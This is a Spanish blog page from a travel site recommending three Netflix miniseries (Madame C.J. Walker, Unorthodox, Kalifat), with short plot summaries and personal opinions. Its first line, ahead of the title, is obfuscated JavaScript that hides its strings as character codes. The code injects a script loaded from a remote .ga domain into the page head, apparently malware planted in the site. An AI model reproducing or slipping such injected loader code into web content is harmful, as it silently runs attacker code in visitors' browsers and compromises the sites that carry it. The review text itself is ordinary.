Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Las 3 miniseries que reavivarán tu amor por Netflix - Furgoplan
Las 3 miniseries que reavivarán tu amor por Netflix

Las 3 miniseries que reavivarán tu amor por Netflix

 

Netflix nos ha dado mucho esta cuarentena. Y sus miniseries se han situado en el top de los maratones. Estando confinados poco podemos (o poco nos apetece) hablar de viajes.

Quien sale a trabajar, quien teletrabaja o quien estudia en casa ya tiene, por buena o mala suerte, parte del día ocupado.

Los que tienen perro al menos ven el sol. Y el resto mantiene la cordura como puede. Tú, hace una semana que te pegaste el gran atracón con la casa de papel.

Pero estás harto de Netflix, de HBO y de Amazon prime.

(ALERTA SPOILER ENCUBIERTO -solo en el siguiente párrafo – de la casa de papel)

Ya. A nosotros también nos ha pasado. Nos han crecido las uñas, y mucho, que destrozamos mientras veíamos como el castillo de naipes que habían construido en la casa de papel se desmoronaba poco a poco, a pesar de las maniobras imposibles de unos y otros.

Pasamos días buscando la serie que llenaría ese vacío que dejaron sus personajes (unos más que otros) en nuestros corazoncitos.

Y por suerte, hemos encontrado otro formato que se está poniendo muy de moda ahora en las plataformas de series y películas: Las miniseries.

Está semana, como buena friky que soy, me he metido entre pecho y espalda 3 títulos de este formato y voy a por el cuarto, que añadiré a ésta lista… en un par de días a más tardar.

Sin enrollarme más, aquí mi aportación para que éste fin de semana además de entretenerte, descubras como viven otras personas en nuestro mismo planeta pero en distintos mundos.

1- Miniserie: Madame C.J. Walker, una mujer hecha a si misma

Esta historia ambientada en Estados Unidos a principios del siglo XX, cuenta la historia de ésta mujer de color, que luchó por llegar a la cumbre de un mundo empresarial de hombres blancos.

JC Walker; Netflix

La marca C.J. Walker, aun comercializada hoy en día, se preocupó por un sector de la población al que nunca antes nadie había prestado atención. Ya que hacía no tanto eran considerados «herramientas de trabajo». Hablo de las personas de color, obviamente, y de las mujeres de color más concretamente.

Tras mucho sacrificio y esfuerzo para sacar su producto adelante, Sarah Breedlove (como se llamaba antes de casarse con Mr. Walker) no bajó la guardia ni un momento para mantener su empresa a flote, y con ella, a su multitud de empleadas y todos los proyectos filántropicos en los que se embarcó.

Madame-CJ-Walker
La actriz Octavia Spencer, a su lado una foto de la auténtica Madame C.J. Walker

La miniserie consta de 4 capítulos. Están basados en la novela escrita por la tataranieta de la protagonista: A´Lelia Bundless.

2- Unorthodox, exitazo de netflix

Aunque pudiera parecerlo, no hay que retroceder en el tiempo para ubicarnos en esta impactante historia.

Esty - Unorthodox - Netflix
Uno de los rituales previos a las bodas judías ortodoxas

La miniserie, que consta de 4 episodios, está inspirada en la autobiografía de Deborah Feldman (Unorthodox: the scandalous rejection of my hasidic roots) Que, por cierto, no he encontrado en castellano, aunque la propia autora reconoce en distintas entrevistas, que su realidad fue todavía más dura que la de la que se representa a lo largo de la miniserie del gigante Netflix.

Su protagonista Esty, sientiendose atrapada en la comunidad judía ortodoxa del barrio de Williamsburg en Nueva York, con tan solo 19 años, decide tomar sus propias decisiones. Y hasta aquí puedo leer.

En mi opinión, lo más importante no son las decisiones que toma Esty (interpretada brutalmente por Shira Haas), sino el mero hecho de que las lleve a cabo. Además, la serie nos presenta un contexto y una realidad intrigante, opaca y desconocida. Todos aquellos que no pertenecemos a la comunidad judía ortodoxa de Williamsburg (vamos, el 99,99 % de la humanidad) ignoramos este pequeño universo. Ubicado en Nueva York en pleno siglo XXI, no está conectado a las nuevas tecnologías, se habla su propio idioma y en el que aun hoy siguen sangrando viejas heridas.

Unorthodox-netflix

3- Kalifat, la miniserie de Netflix que te provocará taquicardia

Probablemente hemos recibido más información sobre este tema que sobre ninguno de los anteriores. Y aun siendo así, somos incapaces de deshacernos de lo que es cierto, lo que les interesa a algunos que nos creamos y lo que les interesa a otros. Muy confuso todo.

Quizás hace unos años el tema del Estado Islámico estuviera más de moda que en la actualidad. No me refiero a estas últimas semanas en las que solo hablamos del coronavirus, si lo pensamos bien, en los últimos dos años las conversaciones en torno al Estado Islámico se han evaporado. Sus actuaciones en Europa se han reducido de forma drástica, y su poder en Siria parece que se desvanece, o eso nos dicen los medios.

Volviendo a la serie, en este caso la trama se desarrolla desde el punto de vista de distintos personajes. Unos en Siria, otros en Suecia. Desde estas realidades tan polarizadas, la trama se enreda de forma lenta en los primeros capítulos, imparable en los últimos cuatro.

Kalifat - netflix

Durante todos los capítulos hay algo que se esfuerzan en dejar claro y con lo que no puedo coincidir más: esto no es islam.

En ningún caso se subestima el poder de la tela de araña que se llegó a tejer en su día desde Siria, hasta los distintos rincones de Europa a los que llegaron sus células de distintas maneras.

En esta miniserie, las principales protagonistas son 3 mujeres en distintos momentos de la vida. Acompañadas cada una de ellas por distintos personajes varones que las persiguen, apoyan, o incluso, las manipulan o agreden.

Si te decides por esta serie para este fin de semana, cuídate las uñas y no te atragantes con las palomitas. El ritmo va increccendo y para cuando te des cuenta tus pulsaciones habrán subido, y mucho.

Cuando pensaba en que quería escribir sobre estas miniseries…

No me dí cuenta de que todas las protagonistas son mujeres que pelean por un futuro mejor. Por sus sueños y, de distintas formas, empoderadas y decididas. Más o menos jodidas. Todas las historias más cerca de la realidad que de cualquier otra cosa.

Espero que este no sea el obstáculo que te deje dándole vueltas al navegador de series de netflix una y otra vez. Por un lado, porque el feminismo es una lucha para todos y todas, y por otro, porque creo que todas y cada una de ellas nos transportan a realidades nuevas y desconocidas. Realidades de las que siempre se aprende.

Ya sabes que te leemos en las redes 🙂 y aqui debajo si quieres.

0 0 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x
A %d blogueros les gusta esto: